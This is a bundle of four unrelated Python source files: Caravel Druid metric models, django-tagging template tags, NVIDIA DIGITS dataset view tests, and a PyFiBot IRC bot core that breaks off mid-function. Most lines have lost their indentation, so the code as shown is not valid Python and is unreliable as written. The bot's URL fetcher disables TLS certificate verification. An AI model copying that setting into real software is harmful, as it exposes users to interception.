user = relationship('User', backref='logs', foreign_keys=[user_id])
dttm = Column(DateTime, default=func.now())
    dt = Column(Date, default=date.today)
@classmethod
def log_this(cls, f):
"""Decorator to log user actions"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
user_id = None
if g.user:
user_id = g.user.get_id()
d = request.args.to_dict()
d.update(kwargs)
slice_id = d.get('slice_id', 0)
slice_id = int(slice_id) if slice_id else 0
log = cls(
action=f.__name__,
json=json.dumps(d),
dashboard_id=d.get('dashboard_id') or None,
slice_id=slice_id,
user_id=user_id)
db.session.add(log)
db.session.commit()
return f(*args, **kwargs)
return wrapper
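        # Illustrative use on a Flask view (route and view name are
        # hypothetical; the actual wiring lives in the view modules):
        #   @app.route('/caravel/explore/')
        #   @Log.log_this
        #   def explore(): ...
        # Each call stores a Log row with the action name, request args,
        # dashboard/slice ids and the current user id.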
class DruidMetric(Model, AuditMixinNullable):
"""ORM object referencing Druid metrics for a datasource"""
__tablename__ = 'metrics'
id = Column(Integer, primary_key=True)
metric_name = Column(String(512))
verbose_name = Column(String(1024))
metric_type = Column(String(32))
datasource_name = Column(
String(255),
ForeignKey('datasources.datasource_name'))
# Setting enable_typechecks=False disables polymorphic inheritance.
datasource = relationship('DruidDatasource', backref='metrics',
enable_typechecks=False)
json = Column(Text)
description = Column(Text)
is_restricted = Column(Boolean, default=False, nullable=True)
d3format = Column(String(128))
@property
def json_obj(self):
try:
obj = json.loads(self.json)
except Exception:
obj = {}
return obj
@property
def perm(self):
return (
"{parent_name}.[{obj.metric_name}](id:{obj.id})"
).format(obj=self,
parent_name=self.datasource.full_name
) if self.datasource else None
class DruidColumn(Model, AuditMixinNullable):
"""ORM model for storing Druid datasource column metadata"""
__tablename__ = 'columns'
id = Column(Integer, primary_key=True)
datasource_name = Column(
String(255),
ForeignKey('datasources.datasource_name'))
# Setting enable_typechecks=False disables polymorphic inheritance.
datasource = relationship('DruidDatasource', backref='columns',
enable_typechecks=False)
column_name = Column(String(255))
is_active = Column(Boolean, default=True)
type = Column(String(32))
groupby = Column(Boolean, default=False)
count_distinct = Column(Boolean, default=False)
sum = Column(Boolean, default=False)
max = Column(Boolean, default=False)
min = Column(Boolean, default=False)
filterable = Column(Boolean, default=False)
description = Column(Text)
def __repr__(self):
return self.column_name
@property
def isnum(self):
return self.type in ('LONG', 'DOUBLE', 'FLOAT', 'INT')
def generate_metrics(self):
"""Generate metrics based on the column metadata"""
M = DruidMetric # noqa
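        # Creates a COUNT(*) metric, sum/min/max aggregators for numeric
        # columns flagged accordingly, and a count-distinct metric that uses
        # the column's own type for hyperUnique/thetaSketch columns or a
        # 'cardinality' aggregator otherwise.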
metrics = []
metrics.append(DruidMetric(
metric_name='count',
verbose_name='COUNT(*)',
metric_type='count',
json=json.dumps({'type': 'count', 'name': 'count'})
))
        # Druid's aggregators only have a 'double' variant for floating point
        # columns, so FLOAT is mapped to DOUBLE when building the type name.
if self.type in ('DOUBLE', 'FLOAT'):
corrected_type = 'DOUBLE'
else:
corrected_type = self.type
if self.sum and self.isnum:
mt = corrected_type.lower() + 'Sum'
name = 'sum__' + self.column_name
metrics.append(DruidMetric(
metric_name=name,
metric_type='sum',
verbose_name='SUM({})'.format(self.column_name),
json=json.dumps({
'type': mt, 'name': name, 'fieldName': self.column_name})
))
if self.min and self.isnum:
mt = corrected_type.lower() + 'Min'
name = 'min__' + self.column_name
metrics.append(DruidMetric(
metric_name=name,
metric_type='min',
verbose_name='MIN({})'.format(self.column_name),
json=json.dumps({
'type': mt, 'name': name, 'fieldName': self.column_name})
))
if self.max and self.isnum:
mt = corrected_type.lower() + 'Max'
name = 'max__' + self.column_name
metrics.append(DruidMetric(
metric_name=name,
metric_type='max',
verbose_name='MAX({})'.format(self.column_name),
json=json.dumps({
'type': mt, 'name': name, 'fieldName': self.column_name})
))
if self.count_distinct:
name = 'count_distinct__' + self.column_name
if self.type == 'hyperUnique' or self.type == 'thetaSketch':
metrics.append(DruidMetric(
metric_name=name,
verbose_name='COUNT(DISTINCT {})'.format(self.column_name),
metric_type=self.type,
json=json.dumps({
'type': self.type,
'name': name,
'fieldName': self.column_name
})
))
else:
mt = 'count_distinct'
metrics.append(DruidMetric(
metric_name=name,
verbose_name='COUNT(DISTINCT {})'.format(self.column_name),
metric_type='count_distinct',
json=json.dumps({
'type': 'cardinality',
'name': name,
'fieldNames': [self.column_name]})
))
session = get_session()
new_metrics = []
for metric in metrics:
m = (
session.query(M)
.filter(M.metric_name == metric.metric_name)
.filter(M.datasource_name == self.datasource_name)
.filter(DruidCluster.cluster_name == self.datasource.cluster_name)
.first()
)
metric.datasource_name = self.datasource_name
if not m:
new_metrics.append(metric)
session.add(metric)
session.flush()
utils.init_metrics_perm(caravel, new_metrics)
class FavStar(Model):
__tablename__ = 'favstar'
id = Column(Integer, primary_key=True)
user_id = Column(Integer, ForeignKey('ab_user.id'))
class_name = Column(String(50))
obj_id = Column(Integer)
dttm = Column(DateTime, default=func.now())
|
|
from django.db.models import get_model
from django.template import Library, Node, TemplateSyntaxError, Variable, resolve_variable
from django.utils.translation import ugettext as _
from tagging.models import Tag, TaggedItem
from tagging.utils import LINEAR, LOGARITHMIC
register = Library()
class TagsForModelNode(Node):
def __init__(self, model, context_var, counts):
self.model = model
self.context_var = context_var
self.counts = counts
def render(self, context):
model = get_model(*self.model.split('.'))
if model is None:
raise TemplateSyntaxError(_('tags_for_model tag was given an invalid model: %s') % self.model)
context[self.context_var] = Tag.objects.usage_for_model(model, counts=self.counts)
return ''
class TagCloudForModelNode(Node):
def __init__(self, model, context_var, **kwargs):
self.model = model
self.context_var = context_var
self.kwargs = kwargs
def render(self, context):
model = get_model(*self.model.split('.'))
if model is None:
raise TemplateSyntaxError(_('tag_cloud_for_model tag was given an invalid model: %s') % self.model)
context[self.context_var] = \
Tag.objects.cloud_for_model(model, **self.kwargs)
return ''
class TagsForObjectNode(Node):
def __init__(self, obj, context_var):
self.obj = Variable(obj)
self.context_var = context_var
def render(self, context):
context[self.context_var] = \
Tag.objects.get_for_object(self.obj.resolve(context))
return ''
class TaggedObjectsNode(Node):
def __init__(self, tag, model, context_var):
self.tag = Variable(tag)
self.context_var = context_var
self.model = model
def render(self, context):
model = get_model(*self.model.split('.'))
if model is None:
raise TemplateSyntaxError(_('tagged_objects tag was given an invalid model: %s') % self.model)
context[self.context_var] = \
TaggedItem.objects.get_by_model(model, self.tag.resolve(context))
return ''
def do_tags_for_model(parser, token):
"""
Retrieves a list of ``Tag`` objects associated with a given model
and stores them in a context variable.
Usage::
{% tags_for_model [model] as [varname] %}
The model is specified in ``[appname].[modelname]`` format.
Extended usage::
{% tags_for_model [model] as [varname] with counts %}
If specified - by providing extra ``with counts`` arguments - adds
a ``count`` attribute to each tag containing the number of
instances of the given model which have been tagged with it.
Examples::
{% tags_for_model products.Widget as widget_tags %}
{% tags_for_model products.Widget as widget_tags with counts %}
"""
bits = token.contents.split()
len_bits = len(bits)
if len_bits not in (4, 6):
raise TemplateSyntaxError(_('%s tag requires either three or five arguments') % bits[0])
if bits[2] != 'as':
raise TemplateSyntaxError(_("second argument to %s tag must be 'as'") % bits[0])
if len_bits == 6:
if bits[4] != 'with':
raise TemplateSyntaxError(_("if given, fourth argument to %s tag must be 'with'") % bits[0])
if bits[5] != 'counts':
raise TemplateSyntaxError(_("if given, fifth argument to %s tag must be 'counts'") % bits[0])
if len_bits == 4:
return TagsForModelNode(bits[1], bits[3], counts=False)
else:
return TagsForModelNode(bits[1], bits[3], counts=True)
def do_tag_cloud_for_model(parser, token):
"""
Retrieves a list of ``Tag`` objects for a given model, with tag
cloud attributes set, and stores them in a context variable.
Usage::
{% tag_cloud_for_model [model] as [varname] %}
The model is specified in ``[appname].[modelname]`` format.
Extended usage::
{% tag_cloud_for_model [model] as [varname] with [options] %}
Extra options can be provided after an optional ``with`` argument,
with each option being specified in ``[name]=[value]`` format. Valid
extra options are:
``steps``
Integer. Defines the range of font sizes.
``min_count``
Integer. Defines the minimum number of times a tag must have
been used to appear in the cloud.
``distribution``
One of ``linear`` or ``log``. Defines the font-size
distribution algorithm to use when generating the tag cloud.
Examples::
{% tag_cloud_for_model products.Widget as widget_tags %}
{% tag_cloud_for_model products.Widget as widget_tags with steps=9 min_count=3 distribution=log %}
"""
bits = token.contents.split()
len_bits = len(bits)
if len_bits != 4 and len_bits not in range(6, 9):
raise TemplateSyntaxError(_('%s tag requires either three or between five and seven arguments') % bits[0])
if bits[2] != 'as':
raise TemplateSyntaxError(_("second argument to %s tag must be 'as'") % bits[0])
kwargs = {}
if len_bits > 5:
if bits[4] != 'with':
raise TemplateSyntaxError(_("if given, fourth argument to %s tag must be 'with'") % bits[0])
for i in range(5, len_bits):
try:
name, value = bits[i].split('=')
if name == 'steps' or name == 'min_count':
try:
kwargs[str(name)] = int(value)
except ValueError:
raise TemplateSyntaxError(_("%(tag)s tag's '%(option)s' option was not a valid integer: '%(value)s'") % {
'tag': bits[0],
'option': name,
'value': value,
})
elif name == 'distribution':
if value in ['linear', 'log']:
kwargs[str(name)] = {'linear': LINEAR, 'log': LOGARITHMIC}[value]
else:
raise TemplateSyntaxError(_("%(tag)s tag's '%(option)s' option was not a valid choice: '%(value)s'") % {
'tag': bits[0],
'option': name,
'value': value,
})
else:
raise TemplateSyntaxError(_("%(tag)s tag was given an invalid option: '%(option)s'") % {
'tag': bits[0],
'option': name,
})
except ValueError:
raise TemplateSyntaxError(_("%(tag)s tag was given a badly formatted option: '%(option)s'") % {
'tag': bits[0],
'option': bits[i],
})
return TagCloudForModelNode(bits[1], bits[3], **kwargs)
def do_tags_for_object(parser, token):
"""
Retrieves a list of ``Tag`` objects associated with an object and
stores them in a context variable.
Usage::
{% tags_for_object [object] as [varname] %}
Example::
{% tags_for_object foo_object as tag_list %}
"""
bits = token.contents.split()
if len(bits) != 4:
raise TemplateSyntaxError(_('%s tag requires exactly three arguments') % bits[0])
if bits[2] != 'as':
raise TemplateSyntaxError(_("second argument to %s tag must be 'as'") % bits[0])
return TagsForObjectNode(bits[1], bits[3])
def do_tagged_objects(parser, token):
"""
Retrieves a list of instances of a given model which are tagged with
a given ``Tag`` and stores them in a context variable.
Usage::
{% tagged_objects [tag] in [model] as [varname] %}
The model is specified in ``[appname].[modelname]`` format.
The tag must be an instance of a ``Tag``, not the name of a tag.
Example::
{% tagged_objects comedy_tag in tv.Show as comedies %}
"""
bits = token.contents.split()
if len(bits) != 6:
raise TemplateSyntaxError(_('%s tag requires exactly five arguments') % bits[0])
if bits[2] != 'in':
raise TemplateSyntaxError(_("second argument to %s tag must be 'in'") % bits[0])
if bits[4] != 'as':
raise TemplateSyntaxError(_("fourth argument to %s tag must be 'as'") % bits[0])
return TaggedObjectsNode(bits[1], bits[3], bits[5])
register.tag('tags_for_model', do_tags_for_model)
register.tag('tag_cloud_for_model', do_tag_cloud_for_model)
register.tag('tags_for_object', do_tags_for_object)
register.tag('tagged_objects', do_tagged_objects)
|
|
# Copyright (c) 2014-2015, NVIDIA CORPORATION. All rights reserved.
import json
import os
import shutil
import tempfile
import time
import unittest
import itertools
import urllib
from gevent import monkey
monkey.patch_all()
from bs4 import BeautifulSoup
import PIL.Image
from urlparse import urlparse
from cStringIO import StringIO
import digits.test_views
from test_imageset_creator import create_classification_imageset, IMAGE_SIZE as DUMMY_IMAGE_SIZE, IMAGE_COUNT as DUMMY_IMAGE_COUNT
# May be too short on a slow system
TIMEOUT_DATASET = 20
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(digits.test_views.BaseViewsTest):
"""
Provides some functions
"""
@classmethod
def dataset_exists(cls, job_id):
return cls.job_exists(job_id, 'datasets')
@classmethod
def dataset_status(cls, job_id):
return cls.job_status(job_id, 'datasets')
@classmethod
def dataset_info(cls, job_id):
return cls.job_info(job_id, 'datasets')
@classmethod
def abort_dataset(cls, job_id):
return cls.abort_job(job_id, job_type='datasets')
@classmethod
def dataset_wait_completion(cls, job_id, **kwargs):
kwargs['job_type'] = 'datasets'
if 'timeout' not in kwargs:
kwargs['timeout'] = TIMEOUT_DATASET
return cls.job_wait_completion(job_id, **kwargs)
@classmethod
def delete_dataset(cls, job_id):
return cls.delete_job(job_id, job_type='datasets')
class BaseViewsTestWithImageset(BaseViewsTest):
"""
Provides an imageset and some functions
"""
# Inherited classes may want to override these attributes
IMAGE_HEIGHT = 10
IMAGE_WIDTH = 10
IMAGE_CHANNELS = 3
BACKEND = 'lmdb'
COMPRESSION = 'none'
UNBALANCED_CATEGORY = False
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithImageset, cls).setUpClass()
cls.imageset_folder = tempfile.mkdtemp()
# create imageset
cls.imageset_paths = create_classification_imageset(cls.imageset_folder,
add_unbalanced_category=cls.UNBALANCED_CATEGORY)
cls.created_datasets = []
@classmethod
def tearDownClass(cls):
# delete any created datasets
for job_id in cls.created_datasets:
cls.delete_dataset(job_id)
# delete imageset
shutil.rmtree(cls.imageset_folder)
super(BaseViewsTestWithImageset, cls).tearDownClass()
@classmethod
def create_dataset(cls, **kwargs):
"""
Create a dataset
Returns the job_id
Raises RuntimeError if job fails to create
Keyword arguments:
**kwargs -- data to be sent with POST request
"""
data = {
'dataset_name': 'test_dataset',
'method': 'folder',
'folder_train': cls.imageset_folder,
'resize_channels': cls.IMAGE_CHANNELS,
'resize_width': cls.IMAGE_WIDTH,
'resize_height': cls.IMAGE_HEIGHT,
'backend': cls.BACKEND,
'compression': cls.COMPRESSION,
}
data.update(kwargs)
request_json = data.pop('json', False)
url = '/datasets/images/classification'
if request_json:
url += '.json'
rv = cls.app.post(url, data=data)
if request_json:
if rv.status_code != 200:
print json.loads(rv.data)
                raise RuntimeError('Dataset creation failed with %s' % rv.status_code)
return json.loads(rv.data)['id']
# expect a redirect
if not 300 <= rv.status_code <= 310:
s = BeautifulSoup(rv.data)
div = s.select('div.alert-danger')
if div:
raise RuntimeError(div[0])
else:
raise RuntimeError('Failed to create dataset')
job_id = cls.job_id_from_response(rv)
assert cls.dataset_exists(job_id), 'dataset not found after successful creation'
cls.created_datasets.append(job_id)
return job_id
@classmethod
def categoryCount(cls):
return len(cls.imageset_paths.keys())
class BaseViewsTestWithDataset(BaseViewsTestWithImageset):
"""
Provides a dataset and some functions
"""
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithDataset, cls).setUpClass()
cls.dataset_id = cls.create_dataset(json=True)
assert cls.dataset_wait_completion(cls.dataset_id) == 'Done', 'create failed'
################################################################################
# Test classes
################################################################################
class TestViews(BaseViewsTest):
"""
Tests which don't require an imageset or a dataset
"""
def test_page_dataset_new(self):
rv = self.app.get('/datasets/images/classification/new')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'New Image Classification Dataset' in rv.data, 'unexpected page format'
def test_nonexistent_dataset(self):
assert not self.dataset_exists('foo'), "dataset shouldn't exist"
class TestCreation(BaseViewsTestWithImageset):
"""
Dataset creation tests
"""
def test_nonexistent_folder(self):
try:
job_id = self.create_dataset(
folder_train = '/not-a-directory'
)
except RuntimeError:
return
raise AssertionError('Should have failed')
def test_create_json(self):
job_id = self.create_dataset(json=True)
self.abort_dataset(job_id)
def test_create_delete(self):
job_id = self.create_dataset()
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_abort_delete(self):
job_id = self.create_dataset()
assert self.abort_dataset(job_id) == 200, 'abort failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_wait_delete(self):
job_id = self.create_dataset()
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_textfiles(self):
for absolute_path in (True, False):
for local_path in (True, False):
yield self.check_textfiles, absolute_path, local_path
def check_textfiles(self, absolute_path=True, local_path=True):
"""
Create a dataset from textfiles
Arguments:
        absolute_path -- if False, give relative paths and image folders
        local_path -- if True, write the text files to disk and point the job
            at them instead of uploading them with the POST request
"""
textfile_train_images = ''
textfile_labels_file = ''
label_id = 0
for label, images in self.imageset_paths.iteritems():
textfile_labels_file += '%s\n' % label
for image in images:
image_path = image
if absolute_path:
image_path = os.path.join(self.imageset_folder, image_path)
textfile_train_images += '%s %d\n' % (image_path, label_id)
label_id += 1
data = {
'method': 'textfile',
'textfile_use_val': 'y',
}
if local_path:
train_file = os.path.join(self.imageset_folder, "local_train.txt")
labels_file = os.path.join(self.imageset_folder, "local_labels.txt")
# create files in local filesystem - these will be removed in tearDownClass() function
with open(train_file, "w") as outfile:
outfile.write(textfile_train_images)
with open(labels_file, "w") as outfile:
outfile.write(textfile_labels_file)
data['textfile_use_local_files'] = 'True'
data['textfile_local_train_images'] = train_file
# Use the same file for training and validation.
data['textfile_local_val_images'] = train_file
data['textfile_local_labels_file'] = labels_file
else:
# StringIO wrapping is needed to simulate POST file upload.
train_upload = (StringIO(textfile_train_images), "train.txt")
# Use the same list for training and validation.
val_upload = (StringIO(textfile_train_images), "val.txt")
labels_upload = (StringIO(textfile_labels_file), "labels.txt")
data['textfile_train_images'] = train_upload
data['textfile_val_images'] = val_upload
data['textfile_labels_file'] = labels_upload
if not absolute_path:
data['textfile_train_folder'] = self.imageset_folder
data['textfile_val_folder'] = self.imageset_folder
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
class TestImageCount(BaseViewsTestWithImageset):
def test_image_count(self):
for type in ['train','val','test']:
yield self.check_image_count, type
def check_image_count(self, type):
data = {'folder_pct_val': 20,
'folder_pct_test': 10}
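        # With only a train folder, 20% of the images should go to validation
        # and 10% to test (asserted below); for 'val'/'test' a separate folder
        # is passed instead.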
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
image_count = parse_info['train_count'] + parse_info['val_count'] + parse_info['test_count']
assert parse_info['val_count'] == 0.2 * image_count
assert parse_info['test_count'] == 0.1 * image_count
else:
            assert len(info['ParseFolderTasks']) == 2, 'expected exactly two ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
if type == 'val':
assert parse_info['train_count'] == 0
assert parse_info['test_count'] == 0
image_count = parse_info['val_count']
else:
assert parse_info['train_count'] == 0
assert parse_info['val_count'] == 0
image_count = parse_info['test_count']
assert self.categoryCount() == parse_info['label_count']
assert image_count == DUMMY_IMAGE_COUNT * parse_info['label_count'], 'image count mismatch'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestMaxPerClass(BaseViewsTestWithImageset):
def test_max_per_class(self):
for type in ['train','val','test']:
yield self.check_max_per_class, type
def check_max_per_class(self, type):
# create dataset, asking for at most DUMMY_IMAGE_COUNT/2 images per class
assert DUMMY_IMAGE_COUNT%2 == 0
max_per_class = DUMMY_IMAGE_COUNT/2
data = {'folder_pct_val': 0}
if type == 'train':
data['folder_train_max_per_class'] = max_per_class
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
data['folder_val_max_per_class'] = max_per_class
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
data['folder_test_max_per_class'] = max_per_class
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
else:
            assert len(info['ParseFolderTasks']) == 2, 'expected exactly two ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
image_count = parse_info['train_count'] + parse_info['val_count'] + parse_info['test_count']
assert image_count == max_per_class * parse_info['label_count'], 'image count mismatch'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestMinPerClass(BaseViewsTestWithImageset):
UNBALANCED_CATEGORY = True
def test_min_per_class(self):
for type in ['train','val','test']:
yield self.check_min_per_class, type
def check_min_per_class(self, type):
# create dataset, asking for one more image per class
# than available in the "unbalanced" category
min_per_class = DUMMY_IMAGE_COUNT/2+1
data = {'folder_pct_val': 0}
if type == 'train':
data['folder_train_min_per_class'] = min_per_class
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
data['folder_val_min_per_class'] = min_per_class
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
data['folder_test_min_per_class'] = min_per_class
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
else:
assert len(info['ParseFolderTasks']) == 2, 'expected exactly two ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
assert self.categoryCount() == parse_info['label_count']+1
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestCreated(BaseViewsTestWithDataset):
"""
Tests on a dataset that has already been created
"""
def test_index_json(self):
rv = self.app.get('/index.json')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
found = False
for d in content['datasets']:
if d['id'] == self.dataset_id:
found = True
break
assert found, 'dataset not found in list'
def test_dataset_json(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert content['id'] == self.dataset_id, 'expected different job_id'
def test_mean_dimensions(self):
img_url = '/files/%s/mean.jpg' % self.dataset_id
rv = self.app.get(img_url)
assert rv.status_code == 200, 'GET on %s returned %s' % (img_url, rv.status_code)
buff = StringIO(rv.data)
buff.seek(0)
pil_image = PIL.Image.open(buff)
assert pil_image.size == (self.IMAGE_WIDTH, self.IMAGE_HEIGHT), 'image size is %s' % (pil_image.size,)
def test_edit_name(self):
status = self.edit_job(
self.dataset_id,
name='new name'
)
assert status == 200, 'failed with %s' % status
def test_edit_notes(self):
status = self.edit_job(
self.dataset_id,
notes='new notes'
)
assert status == 200, 'failed with %s' % status
def test_backend_selection(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
content = json.loads(rv.data)
for task in content['CreateDbTasks']:
assert task['backend'] == self.BACKEND
class TestCreatedGrayscale(TestCreated):
IMAGE_CHANNELS = 1
class TestCreatedWide(TestCreated):
IMAGE_WIDTH = 20
class TestCreatedTall(TestCreated):
IMAGE_HEIGHT = 20
class TestCreatedHdf5(TestCreated):
BACKEND = 'hdf5'
def test_compression_method(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
content = json.loads(rv.data)
for task in content['CreateDbTasks']:
assert task['compression'] == self.COMPRESSION
class TestCreatedHdf5Gzip(TestCreatedHdf5):
COMPRESSION = 'gzip'
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A modular python bot based on the twisted matrix irc library
@author Riku 'Shrike' Lindblad ([email protected])
@copyright Copyright (c) 2006 Riku Lindblad
@license New-Style BSD
"""
from __future__ import print_function, division
import sys
import os.path
import time
import requests
import fnmatch
import logging
import logging.handlers
import json
import jsonschema
from copy import deepcopy
import colorlogger
USE_COLOR = True
# Make requests quieter by default
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
try:
import yaml
except ImportError:
print("PyYAML not found, please install from http://pyyaml.org/wiki/PyYAML")
sys.exit(1)
# twisted imports
try:
from twisted.internet import reactor, protocol, ssl
except ImportError:
print("Twisted library not found, please install Twisted from http://twistedmatrix.com/products/download")
sys.exit(1)
# default timeout for socket connections
import socket
socket.setdefaulttimeout(20)
import botcore
from util.dictdiffer import DictDiffer
log = logging.getLogger('core')
class Network:
"""Represents an IRC network"""
def __init__(self, root, alias, address, nickname, channels=None, linerate=None, password=None, is_ssl=False):
self.root = root
self.alias = alias # network name
self.address = address # server address
self.nickname = nickname # nick to use
self.channels = channels or {} # channels to join
self.linerate = linerate
self.password = password
self.is_ssl = is_ssl
def __repr__(self):
return 'Network(%r, %r)' % (self.alias, self.address)
class InstantDisconnectProtocol(protocol.Protocol):
def connectionMade(self):
self.transport.loseConnection()
class ThrottledClientFactory(protocol.ClientFactory):
    """Client factory that inserts a slight delay before connecting and reconnecting"""
lostDelay = 10
failedDelay = 60
def clientConnectionLost(self, connector, reason):
print(connector.getDestination())
log.info("connection lost (%s): reconnecting in %d seconds" % (reason, self.lostDelay))
reactor.callLater(self.lostDelay, connector.connect)
def clientConnectionFailed(self, connector, reason):
log.info("connection failed (%s): reconnecting in %d seconds" % (reason, self.failedDelay))
reactor.callLater(self.failedDelay, connector.connect)
class PyFiBotFactory(ThrottledClientFactory):
"""python.fi bot factory"""
version = "2013-02-19"
protocol = botcore.PyFiBot
allBots = None
moduledir = os.path.join(sys.path[0], "modules/")
startTime = None
config = None
def __init__(self, config):
"""Initialize the factory"""
self.config = config
self.data = {}
self.data['networks'] = {}
self.ns = {}
# Cache url contents for 5 minutes, check for old entries every minute
#self._urlcache = timeoutdict.TimeoutDict(timeout=300, pollinterval=60)
def startFactory(self):
self.allBots = {}
self.starttime = time.time()
self._loadmodules()
ThrottledClientFactory.startFactory(self)
log.info("factory started")
def stopFactory(self):
del self.allBots
ThrottledClientFactory.stopFactory(self)
log.info("factory stopped")
def buildProtocol(self, address):
# we are connecting to a server, don't know which yet
log.info("Building protocol for %s", address)
# Go through all defined networks
for network, server in self.data['networks'].items():
log.debug("Looking for matching network: %s - %s", server, address)
# get all of the ipv4 and ipv6 addresses configured for this domain name
addrinfo = socket.getaddrinfo(server.address[0], server.address[1])
ips = set()
for ip in addrinfo:
ips.add(ip[4][0]) # (2, 1, 6, '', ('192.168.191.241', 6667))
# if the address we are connecting to matches one of the IPs defined for
# this network, connect to it and stop looking
if address.host in ips:
log.debug("Connecting to %s / %s", server, address)
p = self.protocol(server)
self.allBots[server.alias] = p
p.factory = self
return p
# TODO: Remove this handling altogether
log.debug("Fall back to old process...")
fqdn = socket.getfqdn(address.host)
log.debug("Address: %s - %s", address, fqdn)
# Fallback to the old, stupid, way of connecting
for network, server in self.data['networks'].items():
log.debug("Looking for matching network: %s - %s", server, fqdn)
found = False
if server.address[0] == fqdn:
log.debug("fqdn matches server address")
found = True
if server.address[0] == address.host:
log.debug("host matches server address")
found = True
if found:
log.debug("Connecting to %s / %s", server, address)
p = self.protocol(server)
self.allBots[server.alias] = p
p.factory = self
return p
# No address found
log.error("Unknown network address: " + repr(address))
return InstantDisconnectProtocol()
def createNetwork(self, address, alias, nickname, channels=None, linerate=None, password=None, is_ssl=False):
self.setNetwork(Network("data", alias, address, nickname, channels, linerate, password, is_ssl))
def setNetwork(self, net):
nets = self.data['networks']
nets[net.alias] = net
self.data['networks'] = nets
def clientConnectionLost(self, connector, reason):
"""Connection lost for some reason"""
log.info("connection to %s lost: %s" % (str(connector.getDestination().host), reason))
# find bot that connects to the address that just disconnected
for n in self.data['networks'].values():
dest = connector.getDestination()
if (dest.host, dest.port) == n.address:
if n.alias in self.allBots:
# did we quit intentionally?
if not self.allBots[n.alias].hasQuit:
# nope, reconnect
ThrottledClientFactory.clientConnectionLost(self, connector, reason)
del self.allBots[n.alias]
return
else:
log.info("No active connection to known network %s" % n.address[0])
def _finalize_modules(self):
"""Call all module finalizers"""
for module in self._findmodules():
# if rehashing (module already in namespace), finalize the old instance first
if module in self.ns:
if 'finalize' in self.ns[module][0]:
log.info("finalize - %s" % module)
self.ns[module][0]['finalize']()
def _loadmodules(self):
"""Load all modules"""
self._finalize_modules()
for module in self._findmodules():
env = self._getGlobals()
log.info("load module - %s" % module)
# Load new version of the module
execfile(os.path.join(self.moduledir, module), env, env)
# Initialize module
if 'init' in env:
log.info("initialize module - %s" % module)
env['init'](self)
# Add to namespace so we can find it later
self.ns[module] = (env, env)
def _unload_removed_modules(self):
"""Unload modules removed from modules -directory"""
# find all modules in namespace, which aren't present in modules -directory
removed_modules = [m for m in self.ns if not m in self._findmodules()]
for m in removed_modules:
# finalize module before deleting it
# TODO: use general _finalize_modules instead of copy-paste
if 'finalize' in self.ns[m][0]:
log.info("finalize - %s" % m)
self.ns[m][0]['finalize']()
del self.ns[m]
log.info('removed module - %s' % m)
def _findmodules(self):
"""Find all modules"""
modules = [m for m in os.listdir(self.moduledir) if m.startswith("module_") and m.endswith(".py")]
return modules
def _getGlobals(self):
"""Global methods for modules"""
g = {}
g['getUrl'] = self.get_url
g['get_url'] = self.get_url
g['getNick'] = self.getNick
g['isAdmin'] = self.isAdmin
g['to_utf8'] = self.to_utf8
g['to_unicode'] = self.to_unicode
return g
def get_url(self, url, nocache=False, params=None, headers=None, cookies=None):
return self.getUrl(url, nocache, params, headers, cookies)
def getUrl(self, url, nocache=False, params=None, headers=None, cookies=None):
"""Gets data, bs and headers for the given url, using the internal cache if necessary"""
# TODO: Make this configurable in the config
browser = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
# Common session for all requests
s = requests.session()
s.verify = False
s.stream = True # Don't fetch content unless asked
s.headers.update({'User-Agent': browser})
# Custom headers from requester
if headers:
s.headers.update(headers)
# Custom cookies from requester
if cookies:
s.cookies.update(cookies)
try:
r = s.get(url, params=params)
